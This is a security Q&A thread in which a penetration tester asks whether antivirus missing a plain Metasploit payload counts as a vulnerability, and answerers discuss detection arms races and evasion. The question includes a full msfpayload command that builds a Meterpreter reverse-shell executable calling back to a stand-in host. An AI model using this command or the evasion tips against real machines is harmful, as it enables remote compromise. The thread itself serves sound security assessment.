6

As part of a workstation pen test, I copy a simple metasploit payload onto the workstation, and try to run it. Usually this is blocked by anti-virus software. However, sometimes it isn't (I won't name the offenders). The AV software is running and correctly detects EICAR, but it doesn't detect a simple non-encoded metasploit payload.

My instinct is that this is a failure of the AV software, and should be reported as a vulnerability. However, I wondered if this behaviour might in fact be intended? Are there legitimate arguments that "metasploit is not a virus"?

In this case the payload is windows/meterpreter/reverse_tcp encoded as an exe file, without obfuscation. Generated using this command:

msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 X > payload.exe
paj28
  • 32,736
  • 8
  • 92
  • 130
  • Have you tried to run the payload? Sometimes AV signature might fail (due to all the randomness in the payload) but once it is run the AV run time behavior analysis detect it. – void_in Jan 30 '15 at 11:44
  • @void_in - yes, payload ran successfully, and I got a working meterpreter instance on my metasploit console – paj28 Jan 30 '15 at 11:59
  • That's signature bases for you! Have you tried it on virustotal.com? It will scan it with a bunch of AVs and tell you which ones think it's malware and which ones think it's clean – Arlix Nov 27 '15 at 08:41
  • Could you state what version of Metasploit you are using? Free vs commercial makes a big difference in the detection since commercial performs AV avoidance as a benefit – Joe Nov 27 '15 at 09:44
  • @Joe - It was the free version, with no obfuscation – paj28 Nov 27 '15 at 09:56
  • And I had to work on getting an AV bypass: http://security.stackexchange.com/q/93499/8340. I suppose Metasploit can be used as a network admin tool (remote access). However, because of the way that it works (stealthily), it should be flagged as a vulnerability if it was able to be uploaded and executed. – SilverlightFox Nov 27 '15 at 16:23

3 Answers3

2

The logical answer is that yes, since Metasploit is largely open source, all AV should detect and block Metasploit generated modules if they are doing their jobs. Unfortunately, the reality is that it is incredibly hard to actually detect and block malicious code/executables even if it is generated with a open source framework such as Metasploit. My take on the matter is simply that Metasploit had a new update and AV vendors have not created signatures for the new generated payloads yet.

Here are some of the reasons:

  1. It is an arms race as TimC mentioned. AV companies find ways to block malicious code via signatures and heuristic detection. This in turns lowers the effectiveness of products and tools designed to bypass AV so new ways of bypassing AV is found and incorporated in the avoidance products. The developers and community contributors of Metasploit understand AV products exceedingly well and with the constant updates, there are often new innovative techniques that will for a period of time avoid AV until the vendors catch up again.

enter image description here

  1. The defenders do not share information effectively and this results in what is detected on one AV might not get flagged by another for quite some time, or ever. While work is progressing towards a standard (http://standards.ieee.org/develop/indconn/icsg/malware.html), business is business and a lot of vendors have their own proprietary standards effectively hindering information sharing. A test by LastLine labs showed just how long it can take for malware detection to be achieved by vendors. PLEASE NOTE: They used, Virustotal for the test and this is NOT a real world test but it does provide interesting information. For more information regarding using VirusTotal for testing, see this: https://community.webroot.com/t5/Techie/Testing-antivirus-with-VirusTotal-is-a-bad-idea/td-p/62881 . It basically boils down to not having the ability to use all detection mechanisms in the VirusTotal environment.

enter image description here

However, I wondered if this behaviour might in fact be intended? Are there legitimate arguments that "metasploit is not a virus"?

No AV vendor would willingly white list Metasploit and I am sure they would gladly classify it as a virus if they could. Proof of this is quite simple, try to install Metasploit on a machine with AV running!

Joe
  • 1,214
  • 1
  • 11
  • 16
  • You realize that Metasploit's obfuscation tools (like shikata_ga_nai) do not work very well, right? Metasploit Pro does have a proper obfuscator, though, which is guaranteed to remain undetected by popular antivirus software. – forest Mar 27 '18 at 02:34
  • @forest Shikata_ga_nai and other encoders were never meant to be used as obfuscators as detailed in this post from Rapid 7 https://blog.rapid7.com/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions/ . Check the Encoder Myth section. Irrespective of their intended purpose, encoders did manage to help evade anti-virus solutions for a while until AV solutions adjusted. – Joe Mar 29 '18 at 10:00
2

It's an arms race. The developers of metasploit want to develop plugins that defeat anti-virus. The developers of anti-virus want to defeat metasploit plugins.

They can't both be successful, so sometimes the AV will roll out signatures that detect all metasploit modules, sometimes the metasploit developers will find a new way to evade AV.

You'd think that the AV vendors had the advantage due to metasploit being open-source, but obviously not in this case.

TimC
  • 552
  • 5
  • 12
  • Thanks for the answer. However, in this case I wasn't using any obfuscation at all - metasploit wasn't even trying to hide the payload. – paj28 Jan 30 '15 at 11:59
0

It depends upon which version of metasploit you are using. In metasploit pro version, you can enjoy Dynamic Payloads which can certainly evade antivirus.

According to Rapid7, Dynamic payloads can :

• Evade the top 10 AV solutions in more than 90% of cases. No AV vendor detects all MSP payload options!

• Use error corrections to make sessions more stable than regular MSF sessions

• Encode the traffic when downloading the payload, which can help evade IPS

Try to upload the payload to Virus Total to check if other antivirus are detecting the payload or not. If a good number of antivirus are considering your payload as virus, that simply means that your antivirus is Outdated. Try Updating your virus definitions or changing your Antivirus.

Sanidhay
  • 191
  • 12
  • It was the free version; no obfuscation or dynamic payloads were used. Virus scanner was up-to-date - just failed to detect. – paj28 Nov 27 '15 at 09:57
  • @paj28 Yes, I can understand. VirusTotal gives us a good example that many viruses goes undetected by number of antivirus. – Sanidhay Nov 27 '15 at 10:00